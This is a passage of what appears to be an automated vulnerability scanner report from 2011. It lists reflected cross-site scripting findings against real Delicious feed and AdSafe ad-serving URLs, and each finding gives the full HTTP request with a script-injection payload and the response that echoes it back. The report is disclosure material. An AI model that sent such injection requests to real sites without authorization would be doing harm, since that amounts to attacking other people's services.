Delicious.Linkrolls.writeln({"count": "1063266<script>alert(1)</script>229a106f66a", "sort": "date", "title": "AWS Buzz on Delicious", "usertags": false, "BASE_URL": "http://www.delicious.com/", "STATIC_URL": "http://www.delicious.com/static/", "version": 2, "user": "awsbuzz", "icon
...[SNIP]...

1.231. http://feeds.delicious.com/v2/js/awsbuzz [icon parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /v2/js/awsbuzz

Issue detail

The value of the icon request parameter is copied into the HTML document as plain text between tags. The payload 4bba2<script>alert(1)</script>aeadd697d46 was submitted in the icon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss4bba2<script>alert(1)</script>aeadd697d46&count=10&sort=date HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 02 Oct 2011 01:31:36 GMT
Server: nginx/1.0.5
Content-Length: 710
Connection: keep-alive

if (typeof window.Delicious == 'undefined') window.Delicious = {};
Delicious.Linkrolls_CB_72296 = function(posts) {
Delicious.Linkrolls.writeln({"count": "10", "sort": "date", "title": "AWS Buzz on Delicious", "usertags": false, "BASE_URL": "http://www.delicious.com/", "STATIC_URL": "http://www.delicious.com/static/", "version": 2, "user": "awsbuzz", "icon": "rss4bba2<script>alert(1)</script>aeadd697d46"}, posts);
};
document.writeln('<scr'+'ipt type="text/javascript" src="http://www.delicious.com/static/js/del-linkrolls.js">
...[SNIP]...

1.232. http://feeds.delicious.com/v2/js/awsbuzz [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /v2/js/awsbuzz

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1d17a<script>alert(1)</script>2d39d680b48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss&count=10&sort=date&1d17a<script>alert(1)</script>2d39d680b48=1 HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 02 Oct 2011 01:31:43 GMT
Server: nginx/1.0.5
Content-Length: 719
Connection: keep-alive

if (typeof window.Delicious == 'undefined') window.Delicious = {};
Delicious.Linkrolls_CB_50879 = function(posts) {
Delicious.Linkrolls.writeln({"count": "10", "sort": "date", "title": "AWS Buzz on Delicious", "usertags": false, "BASE_URL": "http://www.delicious.com/", "1d17a<script>alert(1)</script>2d39d680b48": "1", "version": 2, "user": "awsbuzz", "STATIC_URL": "http://www.delicious.com/static/", "icon": "rss"}, posts);
};
document.writeln('<scr'+'ipt type="text/javascript" src="http://www.delicious.com/s
...[SNIP]...

1.233. http://feeds.delicious.com/v2/js/awsbuzz [sort parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /v2/js/awsbuzz

Issue detail

The value of the sort request parameter is copied into the HTML document as plain text between tags. The payload 7b7b2<script>alert(1)</script>b72a370e221 was submitted in the sort parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss&count=10&sort=date7b7b2<script>alert(1)</script>b72a370e221 HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 02 Oct 2011 01:31:41 GMT
Server: nginx/1.0.6
Content-Length: 710
Connection: keep-alive

if (typeof window.Delicious == 'undefined') window.Delicious = {};
Delicious.Linkrolls_CB_10002 = function(posts) {
Delicious.Linkrolls.writeln({"count": "10", "sort": "date7b7b2<script>alert(1)</script>b72a370e221", "title": "AWS Buzz on Delicious", "usertags": false, "BASE_URL": "http://www.delicious.com/", "STATIC_URL": "http://www.delicious.com/static/", "version": 2, "user": "awsbuzz", "icon": "rss"}, posts
...[SNIP]...

1.234. http://feeds.delicious.com/v2/js/awsbuzz [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /v2/js/awsbuzz

Issue detail

The value of the title request parameter is copied into the HTML document as plain text between tags. The payload 1299a<script>alert(1)</script>640aa9f4867 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious1299a<script>alert(1)</script>640aa9f4867&icon=rss&count=10&sort=date HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 02 Oct 2011 01:31:34 GMT
Server: nginx/1.0.5
Content-Length: 710
Connection: keep-alive

if (typeof window.Delicious == 'undefined') window.Delicious = {};
Delicious.Linkrolls_CB_60640 = function(posts) {
Delicious.Linkrolls.writeln({"count": "10", "sort": "date", "title": "AWS Buzz on Delicious1299a<script>alert(1)</script>640aa9f4867", "usertags": false, "BASE_URL": "http://www.delicious.com/", "STATIC_URL": "http://www.delicious.com/static/", "version": 2, "user": "awsbuzz", "icon": "rss"}, posts);
};
document.writeln('<scr'+'ipt
...[SNIP]...

1.235. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e72ac"-alert(1)-"9131707641a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dce72ac"-alert(1)-"9131707641a/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=46E994820BEA60E036BF5BE397EDBBC0; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:34 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dce72ac"-alert(1)-"9131707641a/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requr
...[SNIP]...

1.236. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10fb9"-alert(1)-"6e53e38484e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/1044910fb9"-alert(1)-"6e53e38484e/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5469F15AA88EEE3255E56F24ACA66C81; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:34 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/1044910fb9"-alert(1)-"6e53e38484e/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requrl : ""
...[SNIP]...

1.237. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44c9e"-alert(1)-"e76675c569d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10449/14581744c9e"-alert(1)-"e76675c569d/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:35 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
p%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10449/14581744c9e"-alert(1)-"e76675c569d/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requrl : "",
   reqq
...[SNIP]...

1.238. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac792"-alert(1)-"f774c7feed6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10449/145817/adiac792"-alert(1)-"f774c7feed6/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=49CCDDF0805E1F3B79B8DDA62CB254A9; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:35 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10449/145817/adiac792"-alert(1)-"f774c7feed6/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requrl : "",
   reqquery
...[SNIP]...

1.239. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9e4b"-alert(1)-"80809c3de6e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10449/145817/adi/N5823.InterCLICKc9e4b"-alert(1)-"80809c3de6e/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=77AF6CFE5EC6234805A7DAAF7F27D4BF; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:36 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
news.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10449/145817/adi/N5823.InterCLICKc9e4b"-alert(1)-"80809c3de6e/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "
...[SNIP]...

1.240. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected